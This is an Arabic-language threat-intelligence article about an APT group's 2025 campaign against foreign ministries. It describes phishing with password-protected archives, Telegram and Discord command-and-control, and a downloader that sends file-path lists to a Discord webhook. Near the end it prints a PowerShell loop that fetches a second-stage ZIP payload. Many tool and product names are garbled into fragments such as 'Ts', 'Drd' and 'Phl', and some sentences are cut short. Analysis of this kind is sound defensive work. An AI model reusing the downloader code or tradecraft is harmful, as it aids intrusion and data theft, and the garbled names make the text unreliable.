مجموعة القراصنة أدوات وتقنيات جديدة لمهاجمة المنظمات على مستوى العالم

 

 

 عادت مجموعة القراصنة إلى الظهور بحملة متطورة تستهدف وزارات الخارجية والهيئات الحكومية حول العالم.

ابتداءً من أوائل 2025، غيّرت هذه المجموعة، التي تُصنّف ضمن فئة التهديدات المتقدمة المستمرة (APT)، استراتيجيتها التشغيلية للتركيز على البنية التحتية الدبلوماسية عالية القيمة.

باستخدام مجموعة متنوعة من لغات البرمجة - بما في ذلك Go وRust وC/C++ وPython - عززت المجموعة قدرتها على تجاوز إجراءات الأمن التقليدية مع الحفاظ على سرية بياناتها داخل الشبكات المخترقة والبيئات الثابتة.

 تبدأ هذه الهجمات عادةً برسائل بريد إلكتروني دقيقة التصيد تحتوي على أرشيفات محمية بكلمة مرور.

كثيرًا ما يُخفي المهاجمون الملفات التنفيذية الضارة بامتدادات مزدوجة، أو يُضللون الضحايا باستخدام أيقونات مستندات Office، مما يضمن إخفاء العدوى الأولي.

غالبًا ما تتبع كلمات مرور هذه الأرشيفات نمطًا متوقعًا، مثل "min@2025"، إلا أن هذا التعتيم البسيط يتجاوز بفعالية أجهزة فحص البريد الإلكتروني الآلية.

 بمجرد تنفيذها، تُطلق هذه الحمولات سلسلة من الأحداث المُصممة لتثبيت استمرارية النظام ونشر المزيد من الأدوات الخبيثة والأبواب الخلفية.

 أمن Sst أن Ts قد اعتمدت بشكل متزايد خدمات عامة مثل Telegram وDrd لاتصالات القيادة والتحكم (C2).

يسمح هذا التطور التكتيكي بدمج حركة البيانات الخبيثة بسلاسة مع نشاط الشبكة الشرعي، مما يُعقّد جهود الكشف والاستراتيجيات التي تستخدمها فرق الأمن.

علاوة على ذلك، بدأت المجموعة في نشر أطر عمل مفتوحةلما بعد الاستغلال مثل Hc وAC2، مما يُشير إلى التوجه نحو سلاسل هجمات أكثر مرونةً ومرونة.

 أن هذا المزيج من عمليات الزرع المُخصصة والأدوات مفتوحة  يجعل الإسناد والتخفيف من حدتهما أكثر صعوبةً على المدافعين.

 آلية تنزيل Rt

يُعد Ts Rt Downloader، الذي لم يُوثَّق سابقًا، أحد أبرز مكونات هذه الحملة. بخلاف أدوات استخراج البيانات التقليدية، يُجري هذا البرنامج الخبيث عمليات استطلاع مُستهدفة عن طريق فحص محركات أقراص مُحددة بحثًا عن أنواع ملفات حساسة، بما في ذلك .pdf و.docx و.xlsx.

 

 

 

 مخطط إصابة Ts Pn Drd RShl (Slit)

ومن المثير للاهتمام أن هذا البرنامج لا يسرق هذه الملفات فورًا؛ بل يجمع قائمة بمسارات الملفات وينقلها إلى خطاف ويب Drd باستخدام طلب PST متعدد الأجزاء.

يستخدم البرنامج الخبيث حقل "pad_jsn" لمعلومات النظام وحقل "file" لقائمة المسارات، مما يضمن استخراجًا منظمًا للبيانات.

 تم برمجة البرنامج الخبيث لتجنب اكتشافه عن طريق تجاهل مجلدات محددة مثل "ملفات البرامج" و"ويندوز" و"بيانات التطبيقات".

بعد إرسال قائمة الملفات بنجاح، يُنشئ برنامج التنزيل نصًا برمجيًا بلغة l Bic (st.vbs) يُنفذ نصًا برمجيًا لـ Phl (s.ps1).

 يحتوي هذا البرنامج النصي على حلقة تحاول استرداد حمولة ثانوية - غالبًا أرشيف ZIP يحتوي على ملفات قابلة للتنفيذ أخرى - كل دقيقة.

 

while($true){
    try{
        $Response = Invoke-WebRequest -Uri $Url -UseBasicParsing
        iwr -OutFile $env:Temp\1.zip -Uri $dUrl
        New-Item -Path $env:TEMP\rfolder -ItemType Directory
        break
    }catch{
        Start-Sleep -Seconds 60
    }
}

 

 ويسلط هذا النهج الدقيق للاستطلاع والتسليم على مراحل الضوء على نية المجموعة في البقاء دون أن يتم اكتشافها مع تحديد البيانات ذات القيمة العالية بشكل منهجي لاستخراجها واستغلالها في المستقبل.